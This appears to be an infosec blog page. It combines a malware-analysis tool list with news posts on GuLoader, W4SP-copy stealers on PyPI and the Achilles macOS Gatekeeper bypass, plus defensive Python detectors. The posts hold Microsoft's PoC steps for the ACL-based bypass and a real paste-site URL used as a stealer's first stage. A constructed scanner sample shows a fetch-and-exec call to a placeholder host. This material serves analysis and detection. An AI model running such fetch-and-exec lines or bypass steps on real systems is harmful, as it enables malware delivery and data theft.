    • WinDbg – multipurpose debugger for the Microsoft Windows computer operating system, used to debug user mode applications, device drivers, and the kernel-mode memory dumps.
    • x64dbg – An open-source x64/x32 debugger for Windows.

    Binary Format and Binary Analysis

    The Compound File Binary Format is the basic container used by several different Microsoft file formats such as Microsoft Office documents and Microsoft Installer packages.

    Binary Analysis Resources

     

    Decompiler 

    A decompiler is a computer program that takes an executable file as input and attempts to create a high-level source file which can be recompiled successfully. It is therefore the opposite of a compiler, which takes a source file and makes an executable.

    Generic Decompiler

    Java Decompiler

    .NET Decompiler

    Delphi Decompiler

    Python Decompiler

    Bytecode Analysis

    Bytecode Analysis Tools

    Malware Analysis Tools for Reconstruction

    Import Reconstruction Tools

    Online Scanners and Sandboxes

    • AndroTotal – Free online analysis of APKs against multiple mobile antivirus apps.
    • AVCaesar – Malware.lu online scanner and malware repository.
    • Cryptam – Analyze suspicious office documents.
    • Cuckoo Sandbox – Open source, self hosted sandbox and automated analysis system.
    • cuckoo-modified – Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author.
    • cuckoo-modified-api – A Python API used to control a cuckoo-modified sandbox.
    • DeepViz – Multi-format file analyzer with machine-learning classification.
    • detux – A sandbox developed to do traffic analysis of Linux malware and capture IOCs.
    • DRAKVUF – Dynamic malware analysis system.
    • firmware.re – Unpacks, scans and analyzes almost any firmware package.
    • HaboMalHunter – An Automated Malware Analysis Tool for Linux ELF Files.
    • Hybrid Analysis – Online malware analysis tool, powered by VxSandbox.
    • IRMA – An asynchronous and customizable analysis platform for suspicious files.
    • Joe Sandbox – Deep malware analysis with Joe Sandbox.
    • Jotti – Free online multi-AV scanner.
    • Limon – Sandbox for Analyzing Linux Malware.
    • Malheur – Automatic sandboxed analysis of malware behavior.
    • malsub – A Python RESTful API framework for online malware and URL analysis services.
    • Malware config – Extract, decode and display online the configuration settings from common malwares.
    • Malwr – Free analysis with an online Cuckoo Sandbox instance.
    • MASTIFF Online – Online static analysis of malware.
    • Metadefender.com – Scan a file, hash or IP address for malware (free).
    • NetworkTotal – A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro.
    • Noriben – Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
    • PDF Examiner – Analyse suspicious PDF files.
    • ProcDot – A graphical malware analysis tool kit.
    • Recomposer – A helper script for safely uploading binaries to sandbox sites.
    • Sand droid – Automatic and complete Android application analysis system.
    • SEE – Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments.
    • VirusTotal – Free online analysis of malware samples and URLs.
    • Visualize_Logs – Open source visualization library and command line tools for logs. (Cuckoo, Procmon, more to come…)
    • Zeltser’s List – Free automated sandboxes and services, compiled by Lenny Zeltser.

    Document Analysis

    Document Analysis Tools

    Scripting

    Scripting

    Android

    Android tools

    Yara

    Yara Resources

    Memory Forensics Malware Analysis Tools 

    Tools for dissecting malware in memory images or running systems.

    • BlackLight – Windows/MacOS forensics client supporting hiberfil, pagefile, raw memory analysis.
    • DAMM – Differential Analysis of Malware in Memory, built on Volatility.
    • evolve – Web interface for the Volatility Memory Forensics Framework.
    • FindAES – Find AES encryption keys in memory.
    • inVtero.net – High speed memory analysis framework developed in .NET supports all Windows x64, includes code integrity and write support.
    • Muninn – A script to automate portions of analysis using Volatility, and create a readable report.
    • Rekall – Memory analysis framework, forked from Volatility in 2013.
    • TotalRecall – Script based on Volatility for automating various malware analysis tasks.
    • VolDiff – Run Volatility on memory images before and after malware execution, and report changes.
    • Volatility – Advanced memory forensics framework.
    • VolUtility – Web Interface for Volatility Memory Analysis framework.
    • WDBGARK – WinDBG Anti-RootKit Extension.
    • WinDbg – Live memory inspection and kernel debugging for Windows systems.

    Windows Artifacts

    • AChoir – A live incident response script for gathering Windows artifacts.
    • python-evt – Python library for parsing Windows Event Logs.
    • python-registry – Python library for parsing registry files.
    • RegRipper (GitHub) – Plugin-based registry analysis tool.

    Storage and Workflow

    • Aleph – Open Source Malware Analysis Pipeline System.
    • CRITs – Collaborative Research Into Threats, a malware and threat repository.
    • FAME – A malware analysis framework featuring a pipeline that can be extended with custom modules, which can be chained and interact with each other to perform end-to-end analysis.
    • Malwarehouse – Store, tag, and search malware.
    • Polichombr – A malware analysis platform designed to help analysts to reverse malwares collaboratively.
    • stoQ – Distributed content analysis framework with extensive plugin support, from input to output, and everything in between.
    • Viper – A binary management and analysis framework for analysts and researchers.

    Malware samples

    Malware samples collected for analysis.

    • Clean MX – Realtime database of malware and malicious domains.
    • Contagio – A collection of recent malware samples and analyses.
    • Exploit Database – Exploit and shellcode samples.
    • Malshare – Large repository of malware actively scraped from malicious sites.
    • MalwareDB – Malware samples repository.
    • Open Malware Project – Sample information and downloads. Formerly Offensive Computing.
    • Ragpicker – Plugin based malware crawler with pre-analysis and reporting functionalities
    • theZoo – Live malware samples for analysts.
    • Tracker h3x – Aggregator for malware corpus trackers and malicious download sites.
    • ViruSign – Malware database of samples detected by many anti-malware programs except ClamAV.
    • VirusShare – Malware repository, registration required.
    • VX Vault – Active collection of malware samples.
    • Zeltser’s Sources – A list of malware sample sources put together by Lenny Zeltser.
    • Zeus Source Code – Source for the Zeus trojan leaked in 2011.

    Domain Malware Analysis Tools

    Inspect domains and IP addresses.

    • badips.com – Community based IP blacklist service.
    • boomerang – A tool designed for consistent and safe capture of off network web resources.
    • Cymon – Threat intelligence tracker, with IP/domain/hash search.
    • Desenmascara.me – One click tool to retrieve as much metadata as possible for a website and to assess its good standing.
    • Dig – Free online dig and other network tools.
    • dnstwist – Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
    • IPinfo – Gather information about an IP or domain by searching online resources.
    • Machinae – OSINT tool for gathering information about URLs, IPs, or hashes. Similar to Automator.
    • mailchecker – Cross-language temporary email detection library.
    • MaltegoVT – Maltego transform for the VirusTotal API. Allows domain/IP research, and searching for file hashes and scan reports.
    • Multi rbl – Multiple DNS blacklist and forward confirmed reverse DNS lookup over more than 300 RBLs.
    • NormShield Services – Free API Services for detecting possible phishing domains, blacklisted ip addresses and breached accounts.
    • SpamCop – IP based spam block list.
    • SpamHaus – Block list based on domains and IPs.
    • Sucuri SiteCheck – Free Website Malware and Security Scanner.
    • Talos Intelligence – Search for IP, domain or network owner. (Previously SenderBase.)
    • TekDefense Automater – OSINT tool for gathering information about URLs, IPs, or hashes.
    • URLQuery – Free URL Scanner.
    • Whois – DomainTools free online whois search.
    • Zeltser’s List – Free online tools for researching malicious websites, compiled by Lenny Zeltser.
    • Zscaler Zulu – Zulu URL Risk Analyzer.
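The domain-name permutation technique that dnstwist (listed above) applies to phishing and typo-squatting detection, as an added Python example that is not dnstwist's own code: it generates omission, repetition, transposition, homoglyph and bitsquatting variants of a target domain. The homoglyph table is a small constructed subset, and multi-label suffixes such as co.uk are deliberately out of scope.

```python
import string
from typing import List, Tuple

ALLOWED = set(string.ascii_lowercase + string.digits + "-")

# Constructed, deliberately small homoglyph table; real tools also cover Unicode confusables.
HOMOGLYPHS = {
    "o": ("0",), "l": ("1", "i"), "i": ("1", "l"), "e": ("3",),
    "a": ("4",), "s": ("5",), "m": ("rn",), "w": ("vv",),
}


def _is_valid_label(label: str) -> bool:
    """Keep only labels that are legal DNS hostnames (lowercase LDH, no leading/trailing hyphen)."""
    return (bool(label) and all(c in ALLOWED for c in label)
            and not label.startswith("-") and not label.endswith("-"))


def domain_permutations(domain: str) -> List[Tuple[str, str]]:
    """Return sorted (technique, candidate_domain) pairs for a 'label.tld' domain.
    Assumption: everything after the last dot is the TLD (no co.uk-style suffixes)."""
    label, tld = domain.lower().rsplit(".", 1)
    found = set()
    for i, ch in enumerate(label):
        found.add(("omission", label[:i] + label[i + 1:]))          # exmple
        found.add(("repetition", label[:i] + ch + label[i:]))       # exaample
        for glyph in HOMOGLYPHS.get(ch, ()):
            found.add(("homoglyph", label[:i] + glyph + label[i + 1:]))  # exarnple
        for bit in range(8):                                        # single flipped bit (bitsquatting)
            found.add(("bitsquatting", label[:i] + chr(ord(ch) ^ (1 << bit)) + label[i + 1:]))
        if i + 1 < len(label):                                      # swap adjacent characters
            found.add(("transposition", label[:i] + label[i + 1] + ch + label[i + 2:]))
    return sorted((technique, f"{cand}.{tld}") for technique, cand in found
                  if cand != label and _is_valid_label(cand))


if __name__ == "__main__":
    for technique, candidate in domain_permutations("example.com"):
        print(f"{technique:14} {candidate}")
```

The candidates are the input for the next step, resolving each one and comparing MX/A records and certificate transparency logs against the legitimate domain; invalid bit flips (uppercase, non-ASCII, control characters) are filtered out because DNS is case-insensitive and cannot carry them.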

    Books 

    Most important reverse engineering books

    Documents and Shellcode

    Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section.

    • AnalyzePDF – A tool for analyzing PDFs and attempting to determine whether they are malicious.
    • box-js – A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation.
    • diStorm – Disassembler for analyzing malicious shellcode.
    • JS Beautifier – JavaScript unpacking and deobfuscation.
    • JS Deobfuscator – Deobfuscate simple Javascript that use eval or document.write to conceal its code.
    • libemu – Library and tools for x86 shellcode emulation.
    • malpdfobj – Deconstruct malicious PDFs into a JSON representation.
    • OfficeMalScanner – Scan for malicious traces in MS Office documents.
    • olevba – A script for parsing OLE and OpenXML documents and extracting useful information.
    • Origami PDF – A tool for analyzing malicious PDFs, and more.
    • PDF Tools – pdfid, pdf-parser, and more from Didier Stevens.
    • PDF X-Ray Lite – A PDF analysis tool, the backend-free version of PDF X-RAY.
    • peepdf – Python tool for exploring possibly malicious PDFs.
    • QuickSand – QuickSand is a compact C framework to analyze suspected malware documents to identify exploits in streams of different encodings and to locate and extract embedded executables.
    • Spidermonkey – Mozilla’s JavaScript engine, for debugging malicious JS.

    Practice Malware Analysis Tools 

    Practice Reverse Engineering. Be careful with malware.

    Open Source Threat Intelligence Tools

    Harvest and analyze IOCs.

    • AbuseHelper – An open-source framework for receiving and redistributing abuse feeds and threat intel.
    • AlienVault Open Threat Exchange – Share and collaborate in developing Threat Intelligence.
    • Combine – Tool to gather Threat Intelligence indicators from publicly available sources.
    • Fileintel – Pull intelligence per file hash.
    • Hostintel – Pull intelligence per host.
    • IntelMQ – A tool for CERTs for processing incident data using a message queue.
    • IOC Editor – A free editor for XML IOC files.
    • ioc_writer – Python library for working with OpenIOC objects, from Mandiant.
    • Massive Octo Spice – Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the CSIRT Gadgets Foundation.
    • MISP – Malware Information Sharing Platform curated by The MISP Project.
    • Pulsedive – Free, community-driven threat intelligence platform collecting IOCs from open-source feeds.
    • PyIOCe – A Python OpenIOC editor.
    • RiskIQ – Research, connect, tag and share IPs and domains. (Was PassiveTotal.)
    • threataggregator – Aggregates security threats from a number of sources, including some of those listed below in other resources.
    • ThreatCrowd – A search engine for threats, with graphical visualization.
    • ThreatTracker – A Python script to monitor and generate alerts based on IOCs indexed by a set of Google Custom Search Engines.
    • TIQ-test – Data visualization and statistical analysis of Threat Intelligence feeds.

    Other Resources

    Credits

    This list was created with the help of the following people.

    Infosec books | InfoSec tools | InfoSec services

    Tags: malware analysis tools


    Dec 29 2022

    GuLoader Malware Uses Advanced Anti-Analysis Techniques to Evade Detection

    Category: Antivirus, Malware, Threat detection | DISC @ 11:30 am

    An advanced malware downloader named GuLoader has recently been exposed by cybersecurity researchers at CrowdStrike. This advanced downloader has the capability to evade the detection of security software by adopting a variety of techniques.

    While analyzing GuLoader’s shellcode, CrowdStrike discovered a new anti-analysis technique: the malware scans its entire process memory for VM-related strings to determine whether it is running in an analysis environment.

    Evolution of GuLoader Malware

    On infected machines, GuLoader (aka CloudEyE) distributes remote access trojans such as AgentTesla, FormBook, NanoCore, NETWIRE, Remcos and the Parallax RAT via a VBScript downloader.

    GuLoader has been active since at least 2019 and has undergone several changes in its functionality and delivery methods. Over time, the malware has become more sophisticated, using various methods to evade detection and avoid being removed from infected systems. 

    It has also been distributed through other channels, such as exploit kits and compromised websites, and has been used in campaigns delivering a range of payloads, including ransomware, banking trojans and other malware.

    GuLoader also deploys strong anti-analysis techniques to remain undetected.

    GuLoader uses a three-stage process: a VBScript first injects the shellcode embedded within it into memory; the shellcode then runs anti-analysis checks to protect itself from being analyzed.

    The shellcode carries those same anti-analysis methods to avoid detection by third parties. Through this shellcode the attacker downloads a final payload of their choice and executes it on the compromised host, protected by the same anti-analysis methods as the original shellcode.

    The malware uses anti-debugging and anti-disassembly checks to detect breakpoints placed for code analysis.

    It also has a redundant code injection mechanism to avoid the NTDLL.dll API hooks that antivirus products and EDRs commonly install.

    Anti-malware engines hook NTDLL.dll APIs in user mode to detect and flag suspicious process behaviour on Windows.

    Anti-Analysis Techniques

    Here below we have mentioned the anti-analysis techniques used:-

    • Anti-Debugging
    • Anti-Virtual Machine
    • Process Hollowing

    Experts point out that GuLoader remains a dangerous and constantly evolving threat. They also provided indicators of compromise for the latest version of the downloader, along with other key information.

    GuLoader Malware Advanced Anti-Analysis

    Antivirus Bypass Techniques: Learn practical techniques and tactics to combat, bypass, and evade antivirus software

    Malware Analysis


    Tags: Antivirus Bypass Techniques, Evade Detection, Malware


    Dec 27 2022

    Hackers Deploy New Information Stealer Malware onto Python Developers’ Machines

    Category: Malware, Python | DISC @ 10:48 am

    Researchers at Phylum recently discovered that hackers had been injecting information stealer malware into Python developers’ machines in order to steal their information.

    As they dug deeper, they discovered a new stealer variant circulating under many different names. Its source code reveals that it is a straightforward copy of the older W4SP stealer.

    Attack Chain to Deploy Malware

    In most cases the stealer was dropped directly into the package’s main.py, with no obfuscation and no evident attempt to evade detection.

    Only one instance was found in which multiple stages were used to obscure the attacker’s intentions: a package called chazz used a simple first stage to pull obfuscated code from the klgrth.io paste site.

    The first-stage code closely resembles the injector code and is obfuscated with BlankOBF, an obfuscation program; once deobfuscated, it reveals the Leaf $tealer.
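The two loader shapes described above (a stealer pasted straight into main.py, and a short first stage that fetches obfuscated code from a paste site and executes it) are exactly what a static check on a package's Python sources can flag before installation. The scanner below is an added example, not Phylum's tooling: it walks the AST for exec/eval calls, flags those fed directly from a network fetch, and notes hardcoded URLs, decoder calls and long base64-like blobs. The three package sources at the bottom are constructed, and the paste URL in them is a placeholder, not the real one.

```python
import ast
import base64
import re
from typing import List, Tuple

EXEC_FUNCS = {"exec", "eval", "compile", "__import__"}
DECODE_FUNCS = {"base64.b64decode", "base64.b85decode", "zlib.decompress", "marshal.loads", "codecs.decode"}
NETWORK_ROOTS = {"requests", "urllib", "httpx", "http", "urlopen"}
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/=\s]{200,}$")


def _call_name(call: ast.Call) -> str:
    """Dotted name of the called object, e.g. 'requests.get' or 'exec'."""
    node, parts = call.func, []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def _fetches_from_network(node: ast.AST) -> bool:
    """True if the expression contains a call rooted in a network module."""
    return any(isinstance(sub, ast.Call) and _call_name(sub).split(".")[0] in NETWORK_ROOTS
               for sub in ast.walk(node))


def scan_source(source: str, filename: str = "<package>") -> List[Tuple[int, str]]:
    """Return sorted (line, finding) pairs for one Python source file."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in EXEC_FUNCS:
                if any(_fetches_from_network(arg) for arg in node.args):
                    findings.append((node.lineno, f"{name}() fed directly from a network fetch (remote second stage)"))
                else:
                    findings.append((node.lineno, f"dynamic code execution via {name}()"))
            elif name in DECODE_FUNCS:
                findings.append((node.lineno, f"payload decoder {name}()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith(("http://", "https://")):
                findings.append((node.lineno, f"hardcoded URL {node.value}"))
            elif BASE64_BLOB.match(node.value):
                findings.append((node.lineno, f"{len(node.value)}-character base64-like blob"))
    return sorted(findings)


# Constructed samples. The URL is a placeholder for the paste-site first stage described above.
SAMPLE_FIRST_STAGE = (
    "import requests\n"
    "exec(requests.get(\"https://paste.example.invalid/raw/stage2\").text)\n"
)
SAMPLE_OBFUSCATED = "import base64\nexec(base64.b64decode(%r).decode())\n" % base64.b64encode(b"import os\n" * 30).decode()
SAMPLE_BENIGN = "import json\n\ndef load(path):\n    with open(path) as fh:\n        return json.load(fh)\n"

if __name__ == "__main__":
    for label, src in (("first stage", SAMPLE_FIRST_STAGE), ("obfuscated", SAMPLE_OBFUSCATED), ("benign", SAMPLE_BENIGN)):
        print(label, scan_source(src) or "no findings")
```

Run this over setup.py and every module of a package before `pip install`, not after: the chazz first stage runs at import time, so by the time the code is on disk in site-packages the fetch may already have happened.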

    Malicious Packages

    Listed below are packages sharing similar IOCs; this list can be expected to grow over the coming months and years:

    • modulesecurity – “Celestial Stealer”
    • informmodule – “Leaf $tealer”
    • chazz – first stage that pulls from https://www.klgrth.io/paste/j2yvv/raw, which contains the obfuscated code described above
    • randomtime – “ANGEL stealer”
    • proxygeneratorbil – “@skid STEALER”
    • easycordey – “@skid Stealer”
    • easycordeyy – “@skid Stealer”
    • tomproxies – “@skid STEALER”
    • sys-ej – “Hyperion Obfuscated code”
    • infosys – “@734 Stealer”
    • sysuptoer – “BulkFA Stealer”
    • nowsys – “ANGEL Stealer”
    • upamonkws – “PURE Stealer”
    • captchaboy – “@skid STEALER”
    • proxybooster – “Fade Stealer”

    W4SP Copies

    W4SP’s original publication in loTus’s repository has been disabled by GitHub staff for violating GitHub’s terms and conditions, so it can no longer be found there.

    It has been Phylum’s mission for some time to monitor the actions of these threat actors in an attempt to finally bring down their infrastructure, due to their persistent, pervasive, and egregious nature.

    Several copies of W4SP-Stealer started appearing under different names as soon as the W4SP-Stealer repo was removed. Threat actors are already distributing this new stealer through PyPI, a sign that it is becoming a real threat.

    It has been discovered that W4SP has been hosted in two GitHub repositories under two different aliases, each with its own purpose.

    • Satan Stealer
    • angel-stealer

    There is a copy of the original source here, as well as the earlier versions of W4SP, hosted in an account titled aceeontop. 

    W4SP Stealer will likely remain part of the scene for quite some time to come, as will their imitations and other variants.

    Their number, persistence and sophistication will keep increasing over time. Phylum states that its platform is able to mitigate and block such supply chain attacks.

    Malware Analysis and Detection Engineering: A Comprehensive Approach to Detect and Analyze Modern Malware

    Tags: Information Stealer Malware


    Dec 21 2022

    VirusTotal INTELLIGENCE CHEAT SHEET

    Category: Antivirus, Cheat Sheet, Malware | DISC @ 9:21 am

    VirusTotal cheat sheet makes it easy to search for specific results

    Opening the Blackbox of VirusTotal, analyzing online phishing scan engines

    The Antivirus Hacker’s Handbook

    Mastering Malware Analysis


    Tags: VirusTotal, VirusTotal INTELLIGENCE CHEAT SHEET


    Dec 20 2022

    Microsoft shares details for a Gatekeeper Bypass bug in Apple macOS

    Category: Bug Bounty, Malware | DISC @ 11:02 am

    Microsoft disclosed technical details of a vulnerability in Apple macOS that could be exploited by an attacker to bypass Gatekeeper.

    Microsoft has disclosed details of a now-fixed security vulnerability dubbed Achilles (CVE-2022-42821, CVSS score: 5.5) in Apple macOS that could be exploited by threat actors to bypass the Gatekeeper security feature.

    Apple’s Gatekeeper is designed to protect macOS users by performing a number of checks before allowing an app downloaded from the internet to run: by default it blocks apps that are not signed by an identified developer (and, on recent versions, notarized by Apple) or that did not come from the App Store.

    The flaw was discovered on July 27, 2022, by Jonathan Bar Or of Microsoft; it is a logic issue that Apple addressed with improved checks.

    “On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple’s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call “Achilles”.” reads the post published by Microsoft.

    Microsoft researchers explained that Gatekeeper bypasses can be used by threat actors to install malware on macOS systems.

    The experts pointed out that Apple’s Lockdown Mode, introduced in July, does not prevent exploitation of the Achilles bug.

    The Achilles vulnerability abuses the Access Control List (ACL) permission model: extremely restrictive permissions (i.e., “everyone deny write, writeattr, writeextattr, writesecurity, chown”) are attached to a downloaded file so that the Safari browser cannot set the com.apple.quarantine extended attribute on it, and the Gatekeeper checks that attribute triggers are skipped.

    Below is the POC developed by Microsoft:

    1. Create a fake directory structure with an arbitrary icon and payload.
    2. Create an AppleDouble file with the com.apple.acl.text extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of “everyone deny write,writeattr,writeextattr,writesecurity,chown”). Perform the correct AppleDouble patching if using ditto to generate the AppleDouble file.
    3. Create an archive with the application alongside its AppleDouble file and host it on a web server.

    A video PoC is also available here.
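The Achilles pattern leaves a recognisable trace on disk: a file that carries an “everyone deny” ACL covering the extended-attribute write rights, yet has no com.apple.quarantine attribute. The Python below is an added example, not Microsoft's PoC or Apple's fix; `parse_ls_le` parses the ACL lines macOS `ls -le` prints under each entry, `assess` combines that with the list of xattr names, and `assess_path` wraps the two commands on a live macOS system. The `ls -le` output and xattr lists at the bottom are constructed.

```python
import re
import subprocess
from typing import Dict, List

# Rights whose denial to everyone keeps Safari from writing com.apple.quarantine (CVE-2022-42821).
QUARANTINE_BLOCKING_RIGHTS = {"writeextattr", "writeattr", "writesecurity"}

# One ACE as printed by `ls -le`, e.g. " 0: group:everyone deny write,writeattr,writeextattr"
ACE_RE = re.compile(r"^\s*\d+:\s*(?:group:|user:)?(?P<who>\S+)\s+(?P<kind>allow|deny)\s+(?P<rights>\S+)")


def parse_ls_le(output: str) -> List[Dict[str, object]]:
    """Extract ACL entries from `ls -le` output; non-ACE lines (the file line itself) are ignored."""
    entries = []
    for line in output.splitlines():
        m = ACE_RE.match(line)
        if m:
            entries.append({"who": m.group("who"), "kind": m.group("kind"),
                            "rights": set(m.group("rights").split(","))})
    return entries


def blocks_quarantine(aces: List[Dict[str, object]]) -> bool:
    """True if any ACE denies everyone a right needed to set the quarantine xattr."""
    return any(a["kind"] == "deny" and a["who"] == "everyone"
               and set(a["rights"]) & QUARANTINE_BLOCKING_RIGHTS for a in aces)


def assess(ls_output: str, xattr_names: List[str]) -> str:
    aces = parse_ls_le(ls_output)
    quarantined = "com.apple.quarantine" in xattr_names
    if blocks_quarantine(aces) and not quarantined:
        return "suspicious: deny ACL blocks xattr writes and no quarantine attribute (Achilles pattern)"
    if blocks_quarantine(aces):
        return "warning: deny ACL present, but the file is quarantined"
    if not quarantined:
        return "info: not quarantined, Gatekeeper will not assess it"
    return "ok"


def assess_path(path: str) -> str:
    """Live check; macOS only (needs `ls -le` ACL output and the `xattr` tool)."""
    ls_out = subprocess.run(["ls", "-le", path], capture_output=True, text=True, check=True).stdout
    names = subprocess.run(["xattr", path], capture_output=True, text=True, check=True).stdout.split()
    return assess(ls_out, names)


# Constructed samples modelled on macOS `ls -le` output.
SAMPLE_LS_ACHILLES = (
    "-rwxr-xr-x+ 1 user  staff  1234 Dec 20 10:00 payload\n"
    " 0: group:everyone deny write,writeattr,writeextattr,writesecurity,chown\n"
)
SAMPLE_LS_CLEAN = "-rwxr-xr-x  1 user  staff  1234 Dec 20 10:00 payload\n"

if __name__ == "__main__":
    print(assess(SAMPLE_LS_ACHILLES, []))
    print(assess(SAMPLE_LS_CLEAN, ["com.apple.quarantine"]))
```

On a patched system the ACL is still visible, but Safari attaches the quarantine attribute regardless, which is why the "warning" branch is kept separate from the "suspicious" one.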

    Tags: Gatekeeper Bypass bug


    Next Page »